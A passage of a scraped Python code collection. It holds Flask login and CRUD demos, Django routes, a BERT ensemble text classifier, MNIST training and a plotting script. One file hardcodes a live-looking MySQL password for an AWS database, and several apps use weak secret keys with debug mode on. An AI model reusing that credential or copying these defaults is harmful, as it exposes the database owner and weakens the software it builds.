page\nfrom flask import redirect,url_for#for redirecting to another webpage\nfrom flask import request#for accessing data from form\nfrom flask import session#for accessing session\nfrom datetime import timedelta#accesing time\napp=Flask(__name__)#creating your Flask application instance with the name app\napp.secret_key=\"hello\"\napp.permanent_session_lifetime=timedelta(days=5)#here we are giving the session time as 5 days..we can also gives minutes instead of days\n@app.route(\"/\")#pass '/' to signify that this function respond to main URL\ndef home():\n return \"HELLO\"#connects with html 
page\n@app.route(\"/login\",methods=[\"POST\",\"GET\"])\ndef login():\n if request.method==\"POST\":#when the method is post(while entering data from keyboard) we are storing the input value in to variable user and calls user function\n session.permanent=True#making the session permanent(ususally session is default)\n user=request.form[\"nm\"]\n session[\"user\"]=user#storing value in session\n flash(\"LOGIN SUCCESSFUL\")\n return redirect(url_for(\"user\"))\n else:\n if \"user\" in session:#if user is loged in even if we write user and login we will get user page\n flash(\"ALready login\")\n return redirect(url_for(\"user\"))\n return render_template(\"index1.html\")#if method is post(while clicking submit button) we have to be in the same page\n@app.route(\"/user\")\ndef user():#user() function will get data from session\n if \"user\" in session:#we are checking whether the session is active or not\n user=session[\"user\"]\n return render_template('index2.html',user=user)\n else:\n flash(\"not login\")\n return redirect(url_for(\"login\"))#if session is not active we are going back to login page\n@app.route(\"/logout\")\ndef logout():#logout code\n\n flash(f\"you have been logged out\",\"info\")#message to be displayed( when we logout and got back to login page)\n session.pop(\"user\",None)\n \n return redirect(url_for(\"login\"))\nif __name__==\"__main__\":\n app.run()#run the development server.","sub_path":"LECTURE-6/program2.py","file_name":"program2.py","file_ext":"py","file_size_in_byte":2502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"173377995","text":"import settings\nfrom database import user_repository, session_repository\nfrom services import auth_service, user_service, session_service\n\nclass Ioc:\n def __init__(self):\n self._user_repository = None\n self._session_repository = None\n self._auth_service = None\n self._user_service = None\n self._session_service = None\n\n def get_user_repository(self):\n if self._user_repository is None:\n self._user_repository = user_repository.InMemoryRepository()\n return self._user_repository\n\n def get_session_repository(self):\n if self._session_repository is None:\n self._session_repository = session_repository.InMemoryRepository()\n return self._session_repository\n\n def get_auth_service(self):\n if self._auth_service is None:\n self._auth_service = auth_service.AuthService()\n return self._auth_service\n\n def get_user_service(self):\n if self._user_service is None:\n self._user_service = user_service.UserService(self.get_user_repository(), self.get_auth_service())\n return self._user_service\n\n def _session_service(self):\n if self._session_service is None:\n self._session_service = session_service.SessionService(self.get_session_repository())\n return self._session_service\n\nioc = Ioc()\n","sub_path":"API/ioc.py","file_name":"ioc.py","file_ext":"py","file_size_in_byte":1353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"531293315","text":"from django.urls import path\nfrom . 
import views\n\n\nurlpatterns = [\n path('/', views.home, name='home'),\n path('register', views.register, name='register'),\n path('login', views.loginUser, name='loginUser'),\n path('list', views.listModInstances, name='listModInstances'),\n path('view', views.viewAllRatings, name='viewAllRatings'),\n path('average/', views.averageRating, name='averageRating'),\n path('rate', views.rateProfessor, name='rateProfessor')\n]\n","sub_path":"cwk1Application/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":473,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"197095062","text":"import os\ntry:\n import configparser\nexcept ImportError:\n # Python 2\n import ConfigParser as configparser\n\n\nclass Configuration(object):\n DEFAULTS = {\n 'cipher': 'AES256',\n 'key-length': 64,\n 'password-generator': 'pwgen -nc 12 10',\n }\n\n def __init__(self, topdir):\n self.parser = configparser.RawConfigParser()\n\n self.parser.add_section('sala')\n for k, v in self.DEFAULTS.items():\n self.parser.set('sala', k, v)\n\n xdg_config_home = os.environ.get('XDG_CONFIG_HOME')\n if xdg_config_home is None:\n xdg_config_home = os.path.expanduser('~/.config')\n\n config_files = [\n os.path.expanduser('~/.sala.conf'),\n os.path.join(xdg_config_home, 'sala.conf'),\n os.path.join(topdir, '.sala/config'),\n ]\n\n self.parser.read(config_files)\n\n self.topdir = topdir\n self.saladir = os.path.join(topdir, '.sala')\n self.keyfile = os.path.join(self.saladir, 'key')\n self.hooksdir = os.path.join(self.saladir, 'hooks')\n\n def __getattr__(self, key):\n # Proxies ConfigParser getters like this:\n #\n # config.getint(x) -> config.parser.getint('sala', x)\n #\n\n if key not in ['get', 'getint', 'getfloat', 'getboolean']:\n raise AttributeError(key)\n\n return lambda x: getattr(self.parser, key)('sala', x)\n","sub_path":"sala/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1408,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"204785620","text":"import logging\r\n\r\nimport azure.functions as func\r\n\r\nimport numpy as np\r\nimport pandas as pd\r\nimport pickle\r\nimport json\r\nimport os\r\n\r\ndef main(req: func.HttpRequest) -> func.HttpResponse:\r\n logging.info('Python HTTP trigger function processed a request.')\r\n\r\n \r\n \r\n #data_path = \"../data/\"\r\n data_path = \"/storage_mount/\"\r\n \r\n articles_df = pd.read_csv(data_path+'articles_metadata.csv')\r\n articles_emb = pickle.load(open(data_path+\"articles_embeddings.pickle\",\"rb\"))\r\n clicks_by_hour_df = pd.DataFrame()\r\n for i in range(385):\r\n index = str(i).zfill(3)\r\n clicks_df = pd.read_csv(data_path+'clicks/clicks_hour_'+index+'.csv')\r\n clicks_by_hour_df = clicks_by_hour_df.append(clicks_df)\r\n \r\n user_id = int(req.params.get('user_id'))\r\n \r\n recos = get_recommendations(user_id,articles_df,clicks_by_hour_df,articles_emb)\r\n\r\n return func.HttpResponse(\r\n str(recos),\r\n status_code=200\r\n )\r\n\r\n \r\ndef get_recommendations(user_id,articles_df,clicks_by_hour_df,articles_emb,top_k = 5):\r\n \r\n article_interest_df = clicks_by_hour_df[clicks_by_hour_df.user_id == user_id]['click_article_id']\r\n articles_categories = articles_df[articles_df.article_id.isin(article_interest_df)].category_id\r\n category_freqs = articles_df[articles_df.article_id.isin(article_interest_df)].category_id.value_counts()\r\n \r\n cf = category_freqs.index.to_series()\r\n cat=cf.to_numpy()[0]\r\n\r\n 
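# take the first article from the user's most-read category as the anchor for the embedding similarity search\r\n    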
selected_article = articles_categories[articles_categories==cat].index[0]\r\n exclude_list = articles_categories[articles_categories==cat].index.to_numpy()\r\n current_emb = articles_emb[selected_article]\r\n \r\n similarities = np.dot(current_emb,np.transpose(articles_emb))\r\n\r\n to_retrieve = (top_k + len(exclude_list))-1\r\n selected = similarities.argsort()[-to_retrieve:]\r\n\r\n filtered = set(selected) - set(exclude_list)\r\n\r\n \r\n return list(filtered)\r\n ","sub_path":"azFunction/MyContentFilteringHttpTrigger/.ipynb_checkpoints/__init__-checkpoint.py","file_name":"__init__-checkpoint.py","file_ext":"py","file_size_in_byte":1942,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"173264847","text":"from flask import Flask, request, redirect, render_template, session, flash\nfrom mysqlconnection import MySQLConnector\nimport re\napp = Flask(__name__)\napp.secret_key = \"itsasecret\"\n\nmysql = MySQLConnector(app,'friendsdb')\n\nEMAIL_REGEX = re.compile(r'^[a-zA-Z0-9.+_-]+@[a-zA-Z0-9._-]+\\.[a-zA-Z]*$')\n\n@app.route('/')\ndef index():\n query = \"SELECT * FROM friends\" # define your query\n friends = mysql.query_db(query) # run query with query_db()\n return render_template('index.html', all_friends = friends) # pass data to our template\n\n\n@app.route('/register', methods=['POST'])\ndef create():\n if (len(request.form['first_name']) < 1) or (len(request.form['last_name']) < 1) or (len(session['email']) < 1):\n session['color'] = 'red'\n flash(\"Form cannot be submitted with blank fields - please try again\")\n # incorrect email address format\n if not EMAIL_REGEX.match(request.form['email']):\n session['color'] = 'red'\n flash('Please enter a valid email address.')\n # does first name or last name contain numbers\n elif (request.form['first_name'].isalpha() == False) or (request.form['last_name'].isalpha() == False):\n session['color'] = 'red'\n flash(\"Name must contain only letters.\")\n else:\n session['color'] = 'green'\n query = \"INSERT INTO friends (first_name, last_name, email, created_at, updated_at) VALUES (:first_name, :last_name, :email, NOW(), NOW())\"\n # create dictionary of POST data received\n data = {\n 'first_name': request.form['first_name'],\n 'last_name': request.form['last_name'],\n 'email': request.form['email'],\n }\n mysql.query_db(query, data)\n flash(\"Friend Added!\")\n return redirect('/')\n\n@app.route('/friend//edit', methods=['GET'])\ndef edit(friend_id):\n query = \"SELECT * FROM friends WHERE idfriends = :specific_id\"\n data = {\n 'specific_id': friend_id\n }\n friends = mysql.query_db(query, data)\n return render_template('update.html', one_friend = friends[0])\n\n@app.route('/friend/', methods=['POST'])\ndef update(friend_id):\n query = \"UPDATE friends SET first_name = :first_name, last_name = :last_name, email = :email, updated_at = NOW() WHERE idfriends = :specific_id\"\n data = {\n 'first_name': request.form['first_name'],\n 'last_name': request.form['last_name'],\n 'email': request.form['email'],\n 'specific_id': request.form['form-id']\n # 'specific_id': friend_id\n }\n mysql.query_db(query, data)\n session['color'] = 'green'\n flash(\"Friend Information Updated\")\n return redirect('/')\n\n@app.route('/friend//delete', methods=['POST'])\ndef destroy(friend_id):\n query = \"DELETE FROM friends WHERE idfriends = :specific_id\"\n data = {'specific_id': friend_id}\n mysql.query_db(query, data)\n session['color'] = 'green'\n flash(\"Friend Removed\")\n return 
redirect('/')\n\napp.run(debug=True)\n","sub_path":"Flask_and_MySQL/Full_Friends/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":3059,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"644093402","text":"#!/usr/bin/env python\nfrom flask import Flask, jsonify, request\napp = Flask(__name__)\n\nimport mysql.connector\nfrom mysql.connector import Error\nimport threading\nimport time\n\nconn = mysql.connector.connect(database = \"watsense\", user = \"watsense\", password = \"Anmol2882\", host = \"watsense.cswl7lqcb2fz.us-east-1.rds.amazonaws.com\", port = \"3306\")\nprint ('Opened database successfully')\ncur = conn.cursor()\n\n \n\n\n\n# @app.route('/', methods=['GET'])\n# def test():\n# return jsonify({'message': 'It works'})\n\n@app.route('/', methods=['GET'])\ndef ow():\n global cur\n cur.execute(\"SELECT * from watsense\")\n rows = cur.fetchall()\n data = []\n for row in rows:\n print(row)\n percentage = str(row[0])\n data += [{'percentage':percentage}]\n return jsonify(data)\ndt = []\n\n\nif __name__ == '__main__':\n app.run(debug=True)\n \n# if __name__ == \"__main__\":\n# app.run(host=\"0.0.0.0\", port=\"80\")\n\n\n\n\n","sub_path":"Desktop/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"159766405","text":"import io\nimport re\nimport os\nimport base64\nimport pathlib\nfrom datetime import datetime\nfrom PIL import Image, ImageFont, ImageDraw\nfrom odoo import fields, api, models, tools\nfrom odoo.tools import image\nfrom odoo.addons.assets import ASSETS_PATH\n\n\nclass TVNews(models.Model):\n _name = \"tv.video\"\n\n name = fields.Char(string=\"Name\", required=True)\n title = fields.Char(string=\"Title\", required=True)\n url = fields.Char(string=\"URL\", required=True)\n description = fields.Text(string=\"Description\")\n tags = fields.Many2many(string=\"Tags\", comodel_name=\"tv.news.tags\")\n keys = fields.Many2many(string=\"Keys\", comodel_name=\"tv.news.keys\")\n state = fields.Selection(string=\"Sate\", default=\"draft\",\n selection=[('draft', 'Draft'),\n ('approve', 'Approve'),\n ('cancel', 'Cancel')])\n body = fields.Html(string=\"Body\", help=\"Body\")\n note = fields.Text(string=\"Note\")\n category_id = fields.Many2one(comodel_name=\"tv.news.category\", string=\"Category\")\n hot = fields.Boolean(string=\"Hot**\")\n creation_date = fields.Datetime(string=\"Creation Date\", default=datetime.now())\n schedule_date = fields.Datetime(string=\"Schedule Date\", default=datetime.now())\n category_name = fields.Char(string=\"Category Name\", related=\"category_id.name\", store=True)\n # active = fields.Boolean(string=\"Active\", default=True)\n image = fields.Many2one(string=\"Original\", comodel_name=\"ir.attachment\")\n image_thumb = fields.Many2one(string=\"Thumb\", comodel_name=\"ir.attachment\")\n image_medium = fields.Many2one(string=\"Medium\", comodel_name=\"ir.attachment\")\n image_top = fields.Many2one(string=\"Top\", comodel_name=\"ir.attachment\")\n image_left = fields.Many2one(string=\"Left\", comodel_name=\"ir.attachment\")\n img = fields.Char(string=\"Original\", related=\"image.url\", store=True)\n img_thumb = fields.Char(string=\"Thumb\", related=\"image_thumb.url\", store=True)\n img_medium = fields.Char(string=\"Medium\", related=\"image_medium.url\", store=True)\n img_top = fields.Char(string=\"Top\", related=\"image_top.url\", store=True)\n img_left = 
fields.Char(string=\"Left\", related=\"image_left.url\", store=True)\n # video\n video = fields.Many2one(string=\"Video\", comodel_name=\"ir.attachment\")\n video_url = fields.Char(string=\"Video\", related=\"video.url\", store=True)\n\n @api.onchange('image')\n def _get_image(self):\n for record in self:\n if record.image:\n if not record.image_thumb:\n record.image_thumb = record.image.copy()\n if not record.image_medium:\n record.image_medium = record.image.copy()\n if not record.image_top:\n record.image_top = record.image.copy()\n if not record.image_left:\n record.image_left = record.image.copy()\n\n # @api.model\n # def resize_image(self, data, name, default=\"(128,128)\"):\n # if data:\n # size = self.env['ir.config_parameter'].sudo().get_param(name, default=default)\n # size = eval(size)\n #\n # path_assets = ASSETS_PATH\n # img_path = path_assets.replace(\"/assets\", data.url)\n # img = Image.open(img_path)\n # data_img = open(path_assets.replace(\"/assets\", data.url), \"rb\").read()\n # if not size == img.size:\n # data_img = image.image_resize_image(base64.b64encode(data_img), size=size)\n # data_img = base64.b64decode(data_img)\n # # rewrite file name\n # dot_files = [\".png\", \".jpg\", \".jpeg\", \".gif\"]\n # data_write = {\"name\": data.name, \"url\": data.url, \"local_url\": data.url}\n # new_path = img_path\n # for d_f in dot_files:\n # if data.name.find(d_f) >= 0:\n # str_replace = \"_%s%s\" % (\"x\".join([str(x) for x in size]), d_f)\n # data_write[\"name\"] = data_write[\"name\"].replace(d_f, str_replace)\n # data_write[\"url\"] = data_write[\"url\"].replace(d_f, str_replace)\n # data_write[\"local_url\"] = data_write[\"local_url\"].replace(d_f, str_replace)\n # new_path = new_path.replace(d_f, str_replace)\n # break\n #\n # # write image\n # with open(new_path, \"wb\") as f:\n # f.write(data_img)\n # if not data.is_copy:\n # os.remove(img_path)\n # data.write(data_write)\n # return True\n\n @api.onchange('image_thumb')\n def _onchange_thumb(self):\n # self.resize_image(self.image_thumb, \"tv_news.size_image_thumb\")\n self.img_thumb = self.image_thumb.url\n\n @api.onchange('image_medium')\n def _onchange_medium(self):\n # self.resize_image(self.image_medium, \"tv_news.size_image_medium\", default=\"(250, 160)\")\n self.img_medium = self.image_medium.url\n\n @api.onchange('image_top')\n def _onchange_top(self):\n # self.resize_image(self.image_top, \"tv_news.size_image_top\", default=\"(480, 300)\")\n self.img_top = self.image_top.url\n\n @api.onchange('image_left')\n def _onchange_left(self):\n # self.resize_image(self.image_left, \"tv_news.size_image_left\", default=\"(240, 300)\")\n self.img_left = self.image_left.url\n\n @api.model\n def title_to_url(self, title):\n if title:\n title = title.lower()\n title = re.sub(\"à|á|ạ|ả|ã|â|ầ|ấ|ậ|ẩ|ẫ|ă|ằ|ắ|ặ|ẳ|ẵ\", \"a\", title)\n title = re.sub(\"è|é|ẹ|ẻ|ẽ|ê|ề|ế|ệ|ể|ễ\", \"e\", title)\n title = re.sub(\"ì|í|ị|ỉ|ĩ\", \"i\", title)\n title = re.sub(\"ò|ó|ọ|ỏ|õ|ô|ồ|ố|ộ|ổ|ỗ|ơ|ờ|ớ|ợ|ở|ỡ\", \"o\", title)\n title = re.sub(\"ù|ú|ụ|ủ|ũ|ư|ừ|ứ|ự|ử|ữ\", \"u\", title)\n title = re.sub(\"ỳ|ý|ỵ|ỷ|ỹ\", \"y\", title)\n title = re.sub(\"đ\", \"d\", title)\n title = re.sub(\"!|@|%|\\^|\\*|\\(|\\)|\\+|\\=|\\<|\\>|\\?|\\/|,\"\n \"|\\.|\\:|\\;|\\'|\\\"|\\&|\\#|\\[|\\]|~|\\$|_|`|-|{|}|\\||/\", \"\", title)\n title = re.sub(\"\\+\", \"\", title)\n title = title.strip()\n title = re.sub(\" \", \"-\", title)\n return title\n\n @api.onchange(\"title\")\n def onchange_title(self):\n self.name = self.title\n self.url = 
self.title_to_url(self.title)\n\n @api.multi\n def action_approve(self):\n res = self.write({\"state\": \"approve\"})\n return res\n\n @api.multi\n def action_cancel(self):\n res = self.write({\"state\": \"cancel\"})\n return res\n\n @api.model\n def create(self, values):\n res = super(TVNews, self).create(values)\n self.reset_hot()\n return res\n\n @api.multi\n def write(self, values):\n res = super(TVNews, self).write(values)\n self.reset_hot()\n return res\n\n @api.multi\n def reset_hot(self):\n if self.hot:\n for item in self:\n domain = [('hot', '=', True), ('category_id', '=', item.category_id.id)]\n self.search(domain).write({'hot': False})\n return True\n\n @api.multi\n def remove_image(self):\n for item in self:\n urls = [item.image.url, item.image_thumb.url, item.image_medium.url,\n item.image_top.url, item.image_top.url]\n for url in urls:\n if not url:\n continue\n url = ASSETS_PATH.replace(\"/assets\", url)\n if os.path.exists(url):\n os.remove(url)\n return True\n\n @api.multi\n def unlink(self):\n self.remove_image()\n res = super(TVNews, self).unlink()\n return res\n\n\nTVNews()\n","sub_path":"addons/tv_news/models/video.py","file_name":"video.py","file_ext":"py","file_size_in_byte":7869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"336170797","text":"import json\nimport os\nimport torch\nimport numpy as np\nimport transformers as tfs\nimport pandas as pd\nfrom tqdm import tqdm\ntqdm.pandas(desc='pandas bar')\nfrom torch import nn\nfrom bert_transform_classification import BertClassificationModel\nimport bertwwm_transform_classification\n\ntorch.set_default_tensor_type('torch.cuda.FloatTensor')\ntorch.cuda.set_device(0)\nsoftmax = nn.Softmax(dim=1)\n# Bert预训练模型\npretrain_model_path_bert = '../model_pre/bert_base_chinese/'\npretrain_model_path_bertwwm = '../model_pre/bert_chinese_wwm/'\npretrain_model_path_macbert = 'hfl/chinese-macbert-base'\nbert_model_path='../model/bert_model/bert_model_epoch2.pkl'\nbertwwm_model_path='../model/bertwwm/bertwwm_model_epoch2.pkl'\nmacbert_model_path='../model/macbert/macbert_model_epoch2.pkl'\nsubmission_path='../data/result/submission.csv'\nTEST_FILE_PATH='../data/data_preprocess/test_f_b.csv'\nINDEX = ['人物专栏', '作品分析', '情感解读', '推荐文', '攻略文', '治愈系文章', '深度事件', '物品评测', '科普知识文', '行业解读']\n\ndef predict_(x, index, bert_classifier_model,bertwwm_classifier_model,macbert_classifier_model):\n x1=x[0]+'。'+x[1]\n\n output_bert = bert_classifier_model([x]).cuda() \n output_bertwwm = bert_classifier_model([x1]).cuda()\n output_macbert = macbert_classifier_model([x1]).cuda() \n \n output_bert=output_bert.view((1,-1)).cuda()\n output_bertwwm=output_bertwwm.view((1,-1)).cuda()\n output_macbert=output_macbert.view((1,-1)).cuda()\n \n bert_predicted_proba = softmax(output_bert).cuda().tolist()[0]\n bertwwm_predicted_proba = softmax(output_bertwwm).cuda().tolist()[0]\n macbert_predicted_proba = softmax(output_macbert).cuda().tolist()[0]\n \n predicted_proba=(np.array(bert_predicted_proba)+np.array(bertwwm_predicted_proba)+np.array(macbert_predicted_proba))/3\n predicted_index = np.argmax(predicted_proba)\n predicted_label = index[predicted_index]\n\n # 预测类别的预测概率\n proba = predicted_proba[predicted_index]\n\n return [predicted_label, round(proba, 2)]\n\n\ndef predict_test():\n qita_ids=np.load('../data/encode_data/qita_ids.npy')\n test=pd.read_csv(TEST_FILE_PATH)\n test_drop=test.drop(labels=qita_ids)\n test_text=test['text'].apply(eval)\n test_text=test_text.drop(labels=qita_ids)\n\n print(\"Start 
evaluation...\")\n    print(\"Load bert_classifier model path: \", bert_model_path)\n\n    bert_classifier_model = torch.load(bert_model_path)\n    bert_classifier_model = bert_classifier_model.cuda()\n    bert_classifier_model.eval()\n\n    bertwwm_classifier_model = torch.load(bertwwm_model_path)\n    bertwwm_classifier_model = bertwwm_classifier_model.cuda()\n    bertwwm_classifier_model.eval()\n\n    macbert_classifier_model = torch.load(macbert_model_path)\n    macbert_classifier_model = macbert_classifier_model.cuda()\n    macbert_classifier_model.eval()\n\n    with torch.no_grad():\n        test_drop[[\"predicted_label\", \"proba\"]] = test_text.progress_apply(\n            lambda x: pd.Series(predict_(x, INDEX, bert_classifier_model,bertwwm_classifier_model,macbert_classifier_model)))\n\n    # 提取id, predicted_label两列信息,并重命名列名, 最后输出到文件\n    csv_data = test[['id']]\n    doctype = []\n    for i in range(len(csv_data)):\n        if i in qita_ids:\n            doctype.append('其他')\n        else:\n            doctype.append(test_drop.loc[i]['predicted_label'])\n    csv_data['predict_doctype'] = doctype\n    print(\"\\n\\n=================== The distribution of predictions ===================\\n\")\n    print(csv_data[\"predict_doctype\"].value_counts())\n    print(\"\\n\\n\")\n    csv_data.to_csv(submission_path, index=False,encoding='utf-8')\n    print('done')","sub_path":"code/test_predict.py","file_name":"test_predict.py","file_ext":"py","file_size_in_byte":3765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"441345519","text":"from mugimugi_client_api_entity.enum import Ratio\r\nfrom mugimugi_client_api_entity.main.book import Content\r\n\r\nfrom ......configuration import SAMPLE\r\nfrom ...abstract import Sample\r\n\r\n\r\nclass BookContentFemdom(Sample[Content]):\r\n    file_path = SAMPLE / \"book/item/content/femdom.xml\"\r\n    object = Content(\r\n        english_name=\"Domination (Femdom)\",\r\n        japanese_name=\"女性支配・女王様・ドミナ\",\r\n        katakana_name=\"\",\r\n        other_names=[],\r\n        _id=\"K48\",\r\n        version=2,\r\n        objects_count=7083,\r\n        ratio=Ratio.NOT_SET,\r\n        _type_validator=Content.Type.TYPE,\r\n    )\r\n","sub_path":"test/resource/xml/sample/item/content/femdom.py","file_name":"femdom.py","file_ext":"py","file_size_in_byte":620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"}
{"seq_id":"582116204","text":"# -*- coding: utf-8 -*-\r\n'''Information display operations\r\n\r\n@author: Gao Le\r\n'''\r\n\r\nfrom model.db import db\r\nfrom flask import session, make_response, jsonify\r\nimport time\r\n\r\n\r\nSTATUS = 'active'\r\n\r\n\r\ndef project_list():\r\n    try:\r\n        with db.cursor() as cursor:\r\n            sql = \"SELECT * FROM project\"\r\n            cursor.execute(sql)\r\n            result = cursor.fetchall()\r\n    finally:\r\n        return result\r\n\r\n\r\ndef project_add(project):\r\n    if 'user_id' in session:\r\n        owner_id = session['user_id']\r\n\r\n    try:\r\n        with db.cursor() as cursor:\r\n            sql = \"SELECT * FROM project WHERE name=%s\"\r\n            cursor.execute(sql, project['name'])\r\n            project_exist = cursor.fetchall()\r\n\r\n        if project_exist:\r\n            result = {'msg': '项目名称重复'}\r\n            res_msg = make_response(jsonify(message=\"success\", data=result, status=200), 200)\r\n\r\n        else:\r\n            with db.cursor() as cursor:\r\n                sql = \"INSERT INTO project (name,detail,ownerId,status) VALUE (%s, %s, %s, %s)\"\r\n                cursor.execute(sql, (project['name'], project['detail'], owner_id, STATUS))\r\n                db.commit()\r\n\r\n            with db.cursor() as cursor:\r\n                sql = \"SELECT * FROM project WHERE name=%s\"\r\n                cursor.execute(sql, (project['name']))\r\n                result = cursor.fetchone()\r\n\r\n            res_msg = make_response(jsonify(message=\"success\", data=result, status=201), 201)\r\n    finally:\r\n        return res_msg\r\n\r\n\r\ndef task_list():\r\n    try:\r\n        with db.cursor() as cursor:\r\n            sql = \"SELECT t.id, t.title, t.detail, t.status,t.level,u.username AS ownerName, m.username AS memberName,t.createAt FROM task t \" \\\r\n                  \"LEFT JOIN user u ON t.ownerId=u.id LEFT JOIN user m ON t.memberId=m.id\"\r\n            cursor.execute(sql)\r\n            result = cursor.fetchall()\r\n    finally:\r\n        return result","sub_path":"api/model/info.py","file_name":"info.py","file_ext":"py","file_size_in_byte":1922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
{"seq_id":"159737759","text":"# -*- coding: utf-8 -*-\n# @Time : 19-7-2 5:00 PM\n# @Author : MRB\n# @File : MNIST.py\n# @Software: PyCharm Community Edition\n\nfrom tensorflow.examples.tutorials.mnist import input_data\nimport tensorflow as tf\n\n# Load the MNIST data\nmnist = input_data.read_data_sets(\"MNIST_data\",one_hot=True)\n\n# Hyperparameters\nbatch_size = 100\nlearning_rate = 0.8\nlearning_rate_decay = 0.999\nmax_steps = 30000\n\ntraining_step = tf.Variable(0,trainable=False)\n\n# Network definition\n\ndef hidden_layer(input_tensor,weight1,bias1,weight2,bias2,layer_name):\n    layer1 = tf.nn.relu(tf.matmul(input_tensor,weight1) + bias1)\n    return tf.nn.relu(tf.matmul(layer1,weight2)+bias2)\n\nx = tf.placeholder(tf.float32,[None,784],name='x-input')\ny_ = tf.placeholder(tf.float32,[None,10],name='y-output')\n\n# Hidden layer parameters\nweights1 = tf.Variable(tf.truncated_normal([784,500],stddev=0.1))\nbiases1 = tf.Variable(tf.constant(0.1,shape=[500]))\n# Output layer parameters\nweights2 = tf.Variable(tf.truncated_normal([500,10],stddev=0.1))\nbiases2 = tf.Variable(tf.constant(0.1,shape=[10]))\n\n# Forward pass\ny = hidden_layer(x,weights1,biases1,weights2,biases2,'y')\n\n# Exponential moving average over the trainable variables\naverages_class = tf.train.ExponentialMovingAverage(0.99,training_step)\naverages_op = averages_class.apply(tf.trainable_variables())\n\naverages_y = hidden_layer(x,\n                          averages_class.average(weights1),\n                          averages_class.average(biases1),\n                          averages_class.average(weights2),\n                          averages_class.average(biases2),\n                          \"average_y\")\n\ncross_entropy = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=y,labels=tf.argmax(y_,1))\nregularizer = tf.contrib.layers.l2_regularizer(0.0001)\nregularization = regularizer(weights1) + regularizer(weights2)\n\nloss = tf.reduce_mean(cross_entropy)+regularization\nlearning_rate = tf.train.exponential_decay(learning_rate,training_step,mnist.train.num_examples/batch_size,learning_rate_decay)\n\ntraining_step = tf.train.GradientDescentOptimizer(learning_rate).minimize(loss,global_step=training_step)\n\nwith tf.control_dependencies([training_step,averages_op]):\n    train_op = tf.no_op(name='train')\n\ncorrect_prediction = tf.equal(tf.argmax(averages_y,1),tf.argmax(y_,1))\naccuracy = tf.reduce_mean(tf.cast(correct_prediction,tf.float32))\n\nwith tf.Session() as sess:\n    tf.global_variables_initializer().run()\n    validate_feed = {x:mnist.validation.images,y_:mnist.validation.labels}\n    test_feed = {x: mnist.test.images, y_: mnist.test.labels}\n\n    for i in range(max_steps):\n        if i % 1000 == 0:\n            validate_accuracy = sess.run(accuracy,feed_dict=validate_feed)\n            print(i, validate_accuracy)\n\n        xs,ys = mnist.train.next_batch(batch_size=100)\n        sess.run(train_op,feed_dict={x:xs,y_:ys})\n    test_accuracy = sess.run(accuracy, feed_dict=test_feed)\n    print(max_steps, test_
accuracy)\n","sub_path":"MNIST.py","file_name":"MNIST.py","file_ext":"py","file_size_in_byte":2903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"222106517","text":"# scatterTG.py\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport matplotlib.ticker as tick\n\n# leo el excel\nar = pd.read_excel('Muscle8.xlsx','dw', header=0,index_col=None, na_values=['NA'])\narnum = ar.values\n\nr = arnum.shape[0]\n\nmat = np.empty((3,0))\n\nfor i in range(r):\n if arnum[i,53] > 0:\n mat = np.append(mat,[[arnum[i,1]],[arnum[i,7]],[arnum[i,53]]], axis = 1)\n\n#print (mat[2,:])\n\nTG = mat[2,:]\ncop = mat[1,:]\nTG = TG.astype(float) \ncop = cop.astype(float)\n\n#print(TG,cop)\n\nsizeBA = 0\nsizeN = 0\nsizeBAMIG = 0\n\nfor a in mat[0,:]:\n if a == 'BA':\n sizeBA += 1\n elif a == 'N':\n sizeN += 1\n else:\n sizeBAMIG += 1\n\n#print(sizeBA, sizeN, sizeBAMIG) \n\nfig = plt.figure(facecolor='w', figsize=(7,5))\ncsfont = {'fontname':'Liberation Sans'}\n\ngraph = fig.add_axes([0.18,0.19,0.77,0.75])\n#graph.plot(TG, cop, 'o', color = 'w', markersize = 8, markeredgecolor = 'k')\ngraph.plot(TG[0:sizeBA], cop[0:sizeBA], 'o', color = 'k', markersize = 10, markeredgecolor = 'k')\ngraph.plot(TG[sizeBA:sizeBA+sizeN], cop[sizeBA:sizeBA+sizeN], 'o', color = 'w', markersize = 10, markeredgecolor = 'k')\ngraph.plot(TG[sizeBA+sizeN:sizeBA+sizeN+sizeBAMIG], cop[sizeBA+sizeN:sizeBA+sizeN+sizeBAMIG], 'o', color = 'grey', markersize = 10, markeredgecolor = 'k')\n\n#el cop ajusta una exponencial con TG, asi que linearizo tomando ln de cop y usando ecuacion de la recta\nlogcop = [np.log(s) for s in cop]\nq = np.polyfit(TG, logcop, 1)\ndef func(X,a,b):\n return (a+(X*b))\nx = np.linspace(25,100,100)\nprint(q)\nprint(cop,logcop)\ngraph.semilogy(x, np.exp(func(x,q[1],q[0])), 'k--', linewidth=2)\n\n#seteo ejes\n#plt.ylim(-2,300)\nplt.ylim(0.01,300)\nplt.xlim(0,100)\ngraph.yaxis.set_major_formatter(tick.FormatStrFormatter('%g'))\nplt.yticks([0.01,0.1,1,10,100,1000], size = 20, **csfont)\n#plt.yticks(size = 20, **csfont)\nplt.xticks(np.arange(0,101,25), size = 20, **csfont)\ngraph.set_ylabel(\"Coprostanol (%sg/g dw)\"%(u\"\\u03BC\"), weight = 'bold', size=22, 